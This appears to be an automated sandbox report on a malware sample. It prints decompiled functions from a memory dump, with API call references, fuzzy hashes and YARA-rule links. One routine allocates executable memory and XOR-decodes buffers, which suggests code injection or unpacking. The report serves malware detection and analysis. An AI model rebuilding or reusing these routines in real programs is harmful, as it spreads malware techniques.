InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00416C54,0040398A), ref: 0040AA2E

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 539177dab3010bfbb9b1082670804c19358ae62e6dfd6a0c40bae9dab49acd59
Instruction ID: 9e2852b50f61cca8bbc008d3e1c10688a4e7899385864257a691f3fbd37f335c
Opcode Fuzzy Hash: 539177dab3010bfbb9b1082670804c19358ae62e6dfd6a0c40bae9dab49acd59
Instruction Fuzzy Hash: 3A214DB0501605AFD300DF2AC9C0996FBA8FF48348F50C97EE41997692D739D866CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040E914, Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E914(signed int __eax, void* __esi) {
				short _v260;
				intOrPtr _t10;
				struct HINSTANCE__* _t14;
				intOrPtr _t18;
				intOrPtr _t22;
				signed int _t25;

				_t24 = __esi;
				_t25 = __eax;
				_t10 =  *0x416bf8; // 0x1b8cc48
				if(_t10 == 0x21436587) {
					if(( *0x416c70 & 0x000000ff) != 0 || __eax == 1) {
						goto L3;
					} else {
						 *0x416c70 = 1;
						_t10 = E00401FC4(0x48, __esi);
						 *0x416bf8 = _t10;
						 *0x416c70 = 0;
						if(_t10 != 0x21436587) {
							goto L1;
						} else {
							goto L3;
						}
					}
				} else {
					L1:
					_t18 =  *((intOrPtr*)(_t10 + _t25 * 4));
					if(_t18 == 0) {
						L3:
						"RPh LA"();
						if((_v260 & 0x0000ffff) == 0) {
							return 0;
						} else {
							if(_t25 == 1) {
								_t14 = E0040E874( &_v260);
							} else {
								E0040E4B4(1, _t24);
								_t14 = LoadLibraryW( &_v260);
							}
							_t22 =  *0x416bf8; // 0x1b8cc48
							if(_t22 != 0x21436587) {
								 *(_t22 + _t25 * 4) = _t14;
								return _t14;
							}
							return _t14;
						}
					} else {
						return _t18;
					}
				}
			}

0x0040e914
0x0040e91b
0x0040e91d
0x0040e927
0x0040e999
0x00000000
0x0040e9a0
0x0040e9a5
0x0040e9ac
0x0040e9b1
0x0040e9bb
0x0040e9c2
0x00000000
0x0040e9c8
0x00000000
0x0040e9c8
0x0040e9c2
0x0040e929
0x0040e929
0x0040e929
0x0040e92e
0x0040e938
0x0040e93e
0x0040e94a
0x0040e984
0x0040e94c
0x0040e94f
0x0040e989
0x0040e951
0x0040e956
0x0040e960
0x0040e960
0x0040e962
0x0040e96e
0x0040e970
0x00000000
0x0040e970
0x0040e97a
0x0040e97a
0x0040e937
0x0040e937
0x0040e937
0x0040e92e

APIs

LoadLibraryW.KERNELBASE(?), ref: 0040E960

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 101dd6d137f5e053f4cced53c07c50b0c2e00fceb548b211b312e1c4600f35db
Instruction ID: 5a26911551e1c904521e716c20eafd88a48ebb4247ce45ed86db60b4d31a88b8
Opcode Fuzzy Hash: 101dd6d137f5e053f4cced53c07c50b0c2e00fceb548b211b312e1c4600f35db
Instruction Fuzzy Hash: 9211E9F060811549D7609B7AE8407AE36A16781300F458C3BE0DC967F5EA7DD8D5838A

Uniqueness

Uniqueness Score: -1.00%

Function 00408E20, Relevance: 1.5, APIs: 1, Instructions: 42
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E20(void* __ecx, void* _a4) {
				char _v284;
				void* __esi;
				long _t13;
				int _t16;
				char* _t23;
				intOrPtr* _t24;

				_t24 = _a4;
				 *_t24 = 0;
				_t18 = _t24 + 0xc;
				 *((intOrPtr*)(_t24 + 4)) = 0;
				 *((intOrPtr*)(_t24 + 8)) = 0;
				 *((intOrPtr*)(_t24 + 0xc)) = 0;
				 *((intOrPtr*)(_t24 + 0x10)) = 0;
				E0040E280(_t18, _t24, 0);
				_t16 = 0;
				_t23 =  &_v284;
				while(1) {
					E0040E4B4(0xb7, _t24);
					_t13 = RegEnumKeyA(_a4, _t16, _t23, 0x105); // executed
					if(_t13 != 0) {
						break;
					}
					E0040E200(_t24, _t23);
					_t16 = _t16 + 1;
				}
				return _t24;
			}

0x00408e2c
0x00408e36
0x00408e38
0x00408e3b
0x00408e3e
0x00408e41
0x00408e44
0x00408e47
0x00408e52
0x00408e56
0x00408e58
0x00408e5d
0x00408e6c
0x00408e70
0x00000000
0x00000000
0x00408e75
0x00408e7a
0x00408e7a
0x00408e89

APIs

RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000105,00000000), ref: 00408E6C

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 03df851c402e6869bd247068dc06d23986a1c943e8253d000cb6c9603630f485
Instruction ID: 4335694f89f6f61fd3cf12c44b328c68a8138f43bd1995dd4b1f9e44879fd326
Opcode Fuzzy Hash: 03df851c402e6869bd247068dc06d23986a1c943e8253d000cb6c9603630f485
Instruction Fuzzy Hash: 59F0AF71200B005AD324DB1BCD45DA7FBE8DFD9714F00C93FA4AD93291FA789C018A91

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAB4, Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040BAB4(void* __eax) {
				void* __esi;
				void* _t1;
				intOrPtr* _t4;
				char _t10;
				void* _t13;

				_t1 = __eax;
				_t13 = __eax;
				if(__eax != 0) {
					_t1 = E0040BB14(__eax);
					if(_t1 != 0) {
						_t4 = E0040E4B4(0x5b, _t13);
						E0040824D(_t13,  *_t4( *0x416c00, 0, _t13), 0);
						E0040E4B4(0x58, _t13);
						_t10 = RtlFreeHeap( *0x416c00, 0, _t13); // executed
						return _t10;
					}
				}
				return _t1;
			}

0x0040bab4
0x0040bab8
0x0040babc
0x0040bac0
0x0040bac7
0x0040bace
0x0040bae4
0x0040baee
0x0040bafc
0x00000000
0x0040bafc
0x0040bac7
0x0040bb02

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040BAFC

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2f7c41fb31f326e811238969c26e9915bdedfe27e38341fbf3a124e658f2aea6
Instruction ID: b3dc2f778f1cbce0ae180e115253812e7b461ebf98ff3ddc9b099ea088de2459
Opcode Fuzzy Hash: 2f7c41fb31f326e811238969c26e9915bdedfe27e38341fbf3a124e658f2aea6
Instruction Fuzzy Hash: FEE04F3070192113DA2132BEAC0279B25419F81714F068039B858BA3EAEE6C8C1596DD

Uniqueness

Uniqueness Score: -1.00%

Function 00408190, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408190(void** __ecx, void* __esi, void* __eflags) {
				int _t1;
				void* _t2;
				void** _t6;

				_push(__esi);
				_t6 = __ecx;
				_t1 = E004019A0(__ecx);
				if(_t1 != 0) {
					_t2 = 6;
					E0040E4B4(_t2, __esi);
					_t1 = FindCloseChangeNotification( *_t6); // executed
					 *_t6 = 0;
				}
				return _t1;
			}

0x00408191
0x00408192
0x00408194
0x0040819b
0x0040819f
0x004081a0
0x004081a7
0x004081a9
0x004081a9
0x004081b1

APIs

FindCloseChangeNotification.KERNELBASE(?,?,00000001,0040E9D8,?,004017A2,00000000), ref: 004081A7

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8001cc2682896ba0dd0af3e9441ed7c1f00f62342ffc3075d73103f905ab57f8
Instruction ID: af9a15a6f1f2f6e7e64a597eb0ec120c6bacb593822b3062c768736ed124e1a6
Opcode Fuzzy Hash: 8001cc2682896ba0dd0af3e9441ed7c1f00f62342ffc3075d73103f905ab57f8
Instruction Fuzzy Hash: C1C0803100430119EA302725FC01B4627554FC5314F74043FF400BB2D6DF7F84628108

Uniqueness

Uniqueness Score: -1.00%

Function 00401FD0, Relevance: 1.5, APIs: 1, Instructions: 15
memoryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00401FD0(void* __esi, long _a4) {
				long _t2;
				void* _t6;
				void* _t9;
				long _t13;

				_t15 = __esi;
				_t2 = _a4;
				_push(__esi);
				_t13 = _t2;
				if( *0x416c00 == 0x21436587) {
					E0040E4B4(0x55, __esi);
					_t6 = HeapCreate(0, 0xa00000, 0); // executed
					 *0x416c00 = _t6;
				}
				E0040E4B4(0x57, _t15);
				_t9 = RtlAllocateHeap( *0x416c00, 8, _t13); // executed
				return _t9;
			}

0x00401fd0
0x00401fd0
0x00401fd5
0x00401fd6
0x00401fe2
0x00402001
0x00402011
0x00402013
0x00402013
0x00401fe9
0x00401ff7
0x00401ffb

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,0040E0C9,?,0040279B,00000000), ref: 00401FF7
HeapCreate.KERNELBASE(00000000,00A00000,00000000,?,?,0040E0C9,?,0040279B,00000000), ref: 00402011

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateCreate
String ID:
API String ID: 2875408731-0
Opcode ID: 85e9702336f65e30a47446adca298c25afa9ff32a8aba1845c50985c60ef262c
Instruction ID: dac02280957fab8c2627ff53b3abe08247388f84012bb3c2fc65673661485d08
Opcode Fuzzy Hash: 85e9702336f65e30a47446adca298c25afa9ff32a8aba1845c50985c60ef262c
Instruction Fuzzy Hash: 73D01235308550AED624575DFC09E4F36A4EBC5711F12853EB048921F5EF749800E7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA8C, Relevance: 1.5, APIs: 1, Instructions: 10
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040BA8C(void* __eax, void* __esi) {
				long _t4;
				void* _t6;

				_push(__esi);
				_t6 = __eax;
				E0040E4B4(0xb4, __esi);
				_t4 = RegCloseKey(_t6); // executed
				return _t4;
			}

0x0040ba8d
0x0040ba8e
0x0040ba95
0x0040ba9b
0x0040ba9f

APIs

RegCloseKey.KERNELBASE(00000000,0002010B,?,0040507A,00000000), ref: 0040BA9B

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 5d7a15ae1cb8acce87af8a678ddc4e59697d71df95ef8e0c98ea5d0c2c1b9688
Instruction ID: 797c07abd66790c8bfd09cfaded93f15dbe191063cff44d57d7f413c7fdc0fe6
Opcode Fuzzy Hash: 5d7a15ae1cb8acce87af8a678ddc4e59697d71df95ef8e0c98ea5d0c2c1b9688
Instruction Fuzzy Hash: 65B0123310C1101DE140A2AE6C01E1F11DCCBD6724B10443FF110D21C7ED3C4512413B

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF54, Relevance: 1.5, APIs: 1, Instructions: 10
networkCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040AF54(void* __eax, void* __esi) {
				int _t4;
				void* _t6;

				_push(__esi);
				_t6 = __eax;
				E0040E4B4(0x14b, __esi);
				_t4 = InternetCloseHandle(_t6); // executed
				return _t4;
			}

0x0040af55
0x0040af56
0x0040af5d
0x0040af63
0x0040af67

APIs

InternetCloseHandle.WININET(?,00000000,00000000,0040A1B4,?), ref: 0040AF63

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandleInternet
String ID:
API String ID: 1081599783-0
Opcode ID: 7880e4067ae7cd66d3c9ae02c57d18e4600c2e21f4ea69838dcd2591c580beac
Instruction ID: 1a56170dc2b557cfc791ca2596635bf820e373dedc6b3eb8a501063fbecfd676
Opcode Fuzzy Hash: 7880e4067ae7cd66d3c9ae02c57d18e4600c2e21f4ea69838dcd2591c580beac
Instruction Fuzzy Hash: 22B0123310C00019A140A1BE6C42D5F01DCCBD6724711443FF014D21C6ED2C8412417A

Uniqueness

Uniqueness Score: -1.00%

Function 00402024, Relevance: 1.3, APIs: 1, Instructions: 11
sleepCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402024(long __eax, void* __esi) {
				signed int _t2;
				void* _t3;
				long _t6;

				_push(__esi);
				_t6 = __eax;
				_t2 = 0x7f;
				_t3 = E0040E4B4(_t2, __esi);
				Sleep(_t6); // executed
				return _t3;
			}

0x00402025
0x00402026
0x0040202a
0x0040202b
0x00402031
0x00402035

APIs

Sleep.KERNELBASE(88888889,FFFFFFFF,00000000,00409325,0000002A,0000002F,0000002A,00000000,004149E8,?,0000003B,?,00000000,00000000,00000000,00000000), ref: 00402031

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ce6682ba648f75c11b46b8bac475bee6393c943bb95db2682fb59750cdadd4d5
Instruction ID: e8f848b82d7eae44e6cbda3487244b42d79914921d5202b0b3edb1f475b970d5
Opcode Fuzzy Hash: ce6682ba648f75c11b46b8bac475bee6393c943bb95db2682fb59750cdadd4d5
Instruction Fuzzy Hash: 5CB0123244C30C2DF40031F23C02E36328CCB4112CF100837BD1CD50C3B89E34100064

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407B1D, Relevance: 1.7, Strings: 1, Instructions: 421
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E00407B1D(signed int __eax, intOrPtr __ecx, char __edx, signed char _a4, signed int _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _v100;
				char _v104;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				void* _v128;
				intOrPtr _v132;
				signed char _v140;
				void* _v144;
				char _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				signed int _v168;
				signed char _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				char _v228;
				intOrPtr _v232;
				signed int _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v252;
				void* _v256;
				char _v264;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				void* _v280;
				void* _v296;
				void* _v300;
				void* _v312;
				void* _v316;
				void* _v320;
				void* __esi;
				intOrPtr* _t139;
				intOrPtr _t149;
				char _t152;
				intOrPtr _t157;
				void* _t158;
				char _t159;
				intOrPtr _t161;
				intOrPtr* _t163;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t177;
				char _t180;
				intOrPtr* _t186;
				intOrPtr* _t188;
				char _t192;
				intOrPtr* _t194;
				char _t195;
				intOrPtr* _t197;
				intOrPtr* _t201;
				signed int* _t204;
				intOrPtr* _t207;
				signed int* _t209;
				char _t211;
				intOrPtr* _t213;
				char _t214;
				intOrPtr* _t216;
				intOrPtr* _t220;
				char _t230;
				intOrPtr _t236;
				char _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				char _t240;
				char _t242;
				signed char _t248;
				intOrPtr _t273;
				intOrPtr _t277;
				intOrPtr _t281;
				intOrPtr _t284;
				char _t295;
				intOrPtr _t296;
				intOrPtr _t297;
				char* _t298;
				char _t299;
				intOrPtr _t300;
				void* _t301;
				intOrPtr _t302;
				intOrPtr _t306;
				void* _t307;
				signed char _t309;
				intOrPtr _t310;
				intOrPtr _t312;
				void* _t313;

				_t313 =  &_v200;
				_t295 = __edx;
				_t303 = __eax & 0x000000ff;
				_v20 = __ecx;
				_t139 = E0040E4B4(0x8c, _t303);
				_t237 =  *_t139(0, 0x2860, 0x3000, 0x40);
				if(_t237 == 0) {
					L20:
					return 0;
				} else {
					_t273 =  !=  ? 0x401b20 : E00401A40;
					_t2 = _t237 + 0x2800; // 0x2800
					_v40 = _t2;
					E0040820C(_t237, 0x2800, _t273);
					_v200 = E0040E4B4(0x3b, _t303);
					_v196 = E0040E4B4(0x90, _t303);
					_t149 = E0040E4B4(0x7f, _t303);
					_t309 = _a4;
					_v204 = _t149;
					_v180 = _t295;
					if(_t303 == 0) {
						_v188 = E0040E4B4(0x13, _t303);
						_v164 = _v4;
						_v172 = _t309;
					} else {
						_t236 = E00406AE8(0xc7, _t273);
						_v184 = _t273;
						_t303 = _a8;
						_v188 = _t236;
						_v164 = _v4;
						_v160 = _v0;
						_v172 = _t309;
						_v168 = _a8;
					}
					do {
						_t152 = E00409760();
						_v112 = _t152;
					} while (_t152 == 0);
					E0040824D( &_v80, 0x1c, 0);
					_v104 = E004081D0(_t303);
					_t157 = E0040E4B4(0xd5, _t303);
					_v208 = _t157;
					E004081C0();
					_t158 = _v208(_t157, 0, 0,  &_v80, 0x1c, 0);
					_t277 = 0;
					_t248 = 0;
					_t296 = 0;
					_t159 = 0;
					_t310 = 0;
					_v120 = 0;
					_v236 = 0;
					_v124 = 0;
					if(_t158 == 0) {
						_v244 = 0;
						_t307 = 0;
						_v132 = 0;
						_v116 = 0;
						_v112 = 0;
						_v240 = _t237;
						while(1) {
							_t240 = _v104;
							_t302 = _v92;
							if(0x4149d8 >= _t240 && 0x4149d8 < _t302 + _t240) {
								_v116 = _t240;
								_v236 = _t302;
							}
							if(_t240 <= E00405BF0 && E00405BF0 < _t302 + _t240) {
								_v132 = _t240;
								_v244 = _t302;
							}
							 *((intOrPtr*)(E0040E4B4(0x42, _t307)))();
							_t230 =  ==  ? _t302 : _v124;
							_t310 =  ==  ? _t240 : _t310;
							_t268 =  ==  ? _t240 : _v120;
							_t242 =  ==  ? _t302 : _v112;
							_v124 = _t230;
							_v120 =  ==  ? _t240 : _v120;
							_v112 = _t242;
							if(_v116 != 0 && _v132 != 0 && _t310 != 0 && _v120 != 0) {
								break;
							}
							_t307 = _t307 + _t302;
							E004081C0();
							_push(0);
							_push(0x1c);
							_push( &_v104);
							_push(0);
							_push(_t307);
							_push(_t230);
							if(_v232() == 0) {
								continue;
							}
							break;
						}
						_t159 = _v268;
						_t296 = _v156;
						_t248 = _v140;
						_t277 = _t242;
						_t237 = _v264;
					}
					_v176 = _t277;
					_v156 = _t310;
					_v172 = _t248;
					_v168 = _v236;
					_v160 = _t159;
					_v180 = _v120;
					_v164 = _t296;
					_v152 = _v124;
					_t161 = E0040820C(_v64, 0x60,  &_v228);
					E004065C0();
					_t306 = _t161;
					E004081F0();
					_t312 = _t161;
					_v72 = 0;
					_v68 = 1;
					_t163 = E0040E4B4(0x15, _t306);
					E0040E9D0( &_v80,  *_t163(4, _t306));
					if(E004019A0( &_v84) != 0) {
						E0040824D( &_v140, 0x1c, 0);
						_v140 = 0x1c;
						_t170 = E0040E4B4(0x89, _t306);
						__eflags = _t170;
						if(_t170 != 0) {
							_t211 =  *_t170(_v80,  &_v140);
							__eflags = _t211;
							if(_t211 == 0) {
								E0040EAB0();
								__eflags = _t211;
								if(_t211 == 0) {
									goto L23;
								} else {
									goto L31;
								}
								L41:
								_t177 = E0040E4B4(0x15, _t306);
								E0040E9D0( &_v112,  *_t177(4, _t306));
								_t180 = E004019A0( &_v116);
								__eflags = _t180;
								if(_t180 == 0) {
									__eflags =  *((char*)(_t313 + 0xbc));
									if(__eflags != 0) {
										E00408190( &_v112, _t306, __eflags);
									}
									__eflags = 0;
									return 0;
								} else {
									E0040824D( &_v172, 0x1c, 0);
									_v172 = 0x1c;
									_t186 = E0040E4B4(0x89, _t306);
									__eflags = _t186;
									if(_t186 != 0) {
										_t192 =  *_t186(_v112,  &_v172);
										__eflags = _t192;
										if(_t192 == 0) {
											E0040EAB0();
											__eflags = _t192;
											if(_t192 == 0) {
												goto L44;
											} else {
											}
										} else {
											L44:
											_t298 =  &_v180;
											while(1) {
												__eflags = _t306 - _v168;
												if(_t306 == _v168) {
													__eflags = _t312 - _v172;
													if(_t312 != _v172) {
														 *((intOrPtr*)(_t313 + 0xc)) = 0;
														 *((char*)(_t313 + 0x10)) = 1;
														_t197 = E0040E4B4(0x68, _t306);
														E0040E9D0(_t313 + 0x10,  *_t197(2, 0, _v172));
														_t201 = E0040E4B4(0x77, _t306);
														 *_t201( *((intOrPtr*)(_t313 + 0xc)));
														__eflags =  *((char*)(_t313 + 0x10));
														if(__eflags != 0) {
															E00408190(_t313 + 0xc, _t306, __eflags);
														}
													}
												}
												_t194 = E0040E4B4(0x8a, _t306);
												__eflags = _t194;
												if(_t194 == 0) {
													goto L52;
												}
												_t195 =  *_t194(_v120, _t298);
												__eflags = _t195;
												if(_t195 == 0) {
													E0040EAB0();
													__eflags = _t195;
													if(_t195 == 0) {
														continue;
													} else {
													}
												} else {
													continue;
												}
												goto L52;
											}
										}
									}
									L52:
									_t188 = E0040E4B4(0x8e, _t306);
									 *_t188(_t237, 0, 0x8000);
									__eflags = _v120;
									if(__eflags != 0) {
										E00408190( &_v124, _t306, __eflags);
									}
									return 1;
								}
								goto L68;
							} else {
								L23:
								_t301 = _t313 + 0x7c;
								while(1) {
									__eflags = _t306 -  *((intOrPtr*)(_t313 + 0x88));
									if(_t306 ==  *((intOrPtr*)(_t313 + 0x88))) {
										__eflags = _t312 - _v140;
										if(_t312 != _v140) {
											_v252 = 0;
											 *((char*)(_t313 + 0x18)) = 1;
											_t216 = E0040E4B4(0x68, _t306);
											E0040E9D0( &_v264,  *_t216(2, 0, _v140));
											_t220 = E0040E4B4(0x82, _t306);
											 *_t220(_v268);
											__eflags = _v268;
											if(__eflags != 0) {
												E00408190( &_v268, _t306, __eflags);
											}
										}
									}
									L28:
									_t213 = E0040E4B4(0x8a, _t306);
									__eflags = _t213;
									if(_t213 != 0) {
										_t214 =  *_t213(_v88, _t301);
										__eflags = _t214;
										if(_t214 == 0) {
											E0040EAB0();
											__eflags = _t214;
										} else {
											do {
												__eflags = _t306 -  *((intOrPtr*)(_t313 + 0x88));
												if(_t306 ==  *((intOrPtr*)(_t313 + 0x88))) {
													__eflags = _t312 - _v140;
													if(_t312 != _v140) {
														_v252 = 0;
														 *((char*)(_t313 + 0x18)) = 1;
														_t216 = E0040E4B4(0x68, _t306);
														E0040E9D0( &_v264,  *_t216(2, 0, _v140));
														_t220 = E0040E4B4(0x82, _t306);
														 *_t220(_v268);
														__eflags = _v268;
														if(__eflags != 0) {
															E00408190( &_v268, _t306, __eflags);
														}
													}
												}
												goto L28;
											} while (_t214 == 0);
										}
									}
									goto L31;
								}
							}
						}
						L31:
						_t281 = _v68;
						__eflags =  *((intOrPtr*)(_t281 + 8));
						if( *((intOrPtr*)(_t281 + 8)) > 0) {
							 *((intOrPtr*)(_t313 + 0x10)) = _t237;
							_t300 = 0;
							__eflags = 0;
							_v252 = _t306;
							_t239 = _t281;
							do {
								_t209 = E00409700(_t239, _t300);
								_t300 = _t300 + 1;
								 *_t209 =  *_t209 ^  *(_t313 + 0x78) & 0x000000ff;
								__eflags = _t300 -  *((intOrPtr*)(_t239 + 8));
							} while (_t300 <  *((intOrPtr*)(_t239 + 8)));
							_t306 = _v252;
							_t237 =  *((intOrPtr*)(_t313 + 0x10));
						}
						_v84 = 0;
						_t172 = E0040E4B4(0x14, _t306);
						_t297 =  *_t172(0, 0, _t237, _v72, 0,  &_v84);
						__eflags = _t297;
						if(_t297 != 0) {
							_t207 = E0040E4B4(0x93, _t306);
							 *_t207(_t297, 0xffffffff);
						}
						E0040820C(_t313 + 0x1c, 0x60, _v96);
						_t284 = _v92;
						__eflags =  *((intOrPtr*)(_t284 + 8));
						if( *((intOrPtr*)(_t284 + 8)) > 0) {
							_v272 = _t237;
							_t299 = 0;
							__eflags = 0;
							_v276 = _t306;
							_t238 = _t284;
							do {
								_t204 = E00409700(_t238, _t299);
								_t299 = _t299 + 1;
								 *_t204 =  *_t204 ^ _v172 & 0x000000ff;
								__eflags = _t299 -  *((intOrPtr*)(_t238 + 8));
							} while (_t299 <  *((intOrPtr*)(_t238 + 8)));
							_t306 = _v276;
							_t237 = _v272;
						}
						goto L41;
					} else {
						_t332 = _v76;
						if(_v76 != 0) {
							E00408190( &_v80, _t306, _t332);
						}
						goto L20;
					}
				}
				L68:
			}

0x00407b21
0x00407b27
0x00407b29
0x00407b31
0x00407b38
0x00407b4d
0x00407b51
0x00407e38
0x00407e44
0x00407b57
0x00407b65
0x00407b6d
0x00407b73
0x00407b7a
0x00407b89
0x00407b97
0x00407ba0
0x00407ba5
0x00407bae
0x00407bb2
0x00407bb6
0x00407c02
0x00407c06
0x00407c0a
0x00407bb8
0x00407bbd
0x00407bc2
0x00407bcd
0x00407bdb
0x00407bdf
0x00407be3
0x00407be7
0x00407beb
0x00407beb
0x00407c0e
0x00407c0e
0x00407c13
0x00407c17
0x00407c29
0x00407c33
0x00407c3f
0x00407c44
0x00407c48
0x00407c5d
0x00407c63
0x00407c65
0x00407c67
0x00407c69
0x00407c6b
0x00407c6f
0x00407c76
0x00407c7a
0x00407c81
0x00407c87
0x00407c8b
0x00407c8d
0x00407c91
0x00407c98
0x00407c9f
0x00407ca3
0x00407ca8
0x00407cb1
0x00407cb8
0x00408175
0x0040817c
0x0040817c
0x00407cd1
0x00408168
0x0040816c
0x0040816c
0x00407ced
0x00407cff
0x00407d02
0x00407d13
0x00407d1d
0x00407d20
0x00407d27
0x00407d2e
0x00407d3d
0x00000000
0x00000000
0x00407d54
0x00407d56
0x00407d5f
0x00407d60
0x00407d69
0x00407d6a
0x00407d6b
0x00407d6c
0x00407d73
0x00000000
0x00000000
0x00000000
0x00407d73
0x00407d79
0x00407d7d
0x00407d81
0x00407d88
0x00407d8a
0x00407d8a
0x00407d8e
0x00407d96
0x00407da8
0x00407db1
0x00407db9
0x00407dc4
0x00407dc8
0x00407dcc
0x00407dd0
0x00407dd5
0x00407dda
0x00407ddc
0x00407de1
0x00407de8
0x00407df3
0x00407dfb
0x00407e0d
0x00407e20
0x00407e50
0x00407e5a
0x00407e62
0x00407e67
0x00407e69
0x00407e7b
0x00407e7d
0x00407e7f
0x00408156
0x0040815b
0x0040815d
0x00000000
0x00408163
0x00000000
0x00408163
0x00407fd4
0x00407fd9
0x00407feb
0x00407ff7
0x00407ffc
0x00407ffe
0x00408100
0x00408108
0x00408111
0x00408111
0x00408116
0x00408122
0x00408004
0x0040800f
0x00408019
0x00408021
0x00408026
0x00408028
0x0040803a
0x0040803c
0x0040803e
0x00408144
0x00408149
0x0040814b
0x00000000
0x00000000
0x00408151
0x00408044
0x00408044
0x00408044
0x00408048
0x00408048
0x0040804f
0x00408051
0x00408058
0x0040805f
0x00408067
0x0040806c
0x00408083
0x0040808d
0x00408096
0x00408098
0x0040809d
0x004080a3
0x004080a3
0x0040809d
0x00408058
0x004080ad
0x004080b2
0x004080b4
0x00000000
0x00000000
0x004080be
0x004080c0
0x004080c2
0x00408135
0x0040813a
0x0040813c
0x00000000
0x00000000
0x00408142
0x004080c4
0x00000000
0x004080c4
0x00000000
0x004080c2
0x00408048
0x0040803e
0x004080c6
0x004080cb
0x004080d8
0x004080da
0x004080e2
0x004080eb
0x004080eb
0x004080ff
0x004080ff
0x00000000
0x00407e85
0x00407e85
0x00407e85
0x00407e89
0x00407e89
0x00407e90
0x00407e92
0x00407e99
0x00407ea0
0x00407ea8
0x00407ead
0x00407ec4
0x00407ece
0x00407ed7
0x00407ed9
0x00407ede
0x00407ee4
0x00407ee4
0x00407ede
0x00407e99
0x00407ee9
0x00407eee
0x00407ef3
0x00407ef5
0x00407eff
0x00407f01
0x00407f03
0x00408123
0x00408128
0x00407f09
0x00407e89
0x00407e89
0x00407e90
0x00407e92
0x00407e99
0x00407ea0
0x00407ea8
0x00407ead
0x00407ec4
0x00407ece
0x00407ed7
0x00407ed9
0x00407ede
0x00407ee4
0x00407ee4
0x00407ede
0x00407e99
0x00000000
0x00407e90
0x00408130
0x00407f03
0x00000000
0x00407ef5
0x00407e89
0x00407e7f
0x00407f0e
0x00407f0e
0x00407f15
0x00407f19
0x00407f1b
0x00407f1f
0x00407f1f
0x00407f21
0x00407f25
0x00407f27
0x00407f2a
0x00407f31
0x00407f37
0x00407f39
0x00407f39
0x00407f3e
0x00407f42
0x00407f42
0x00407f4b
0x00407f56
0x00407f72
0x00407f74
0x00407f76
0x00407f7d
0x00407f85
0x00407f85
0x00407f97
0x00407f9c
0x00407fa3
0x00407fa7
0x00407fa9
0x00407fad
0x00407fad
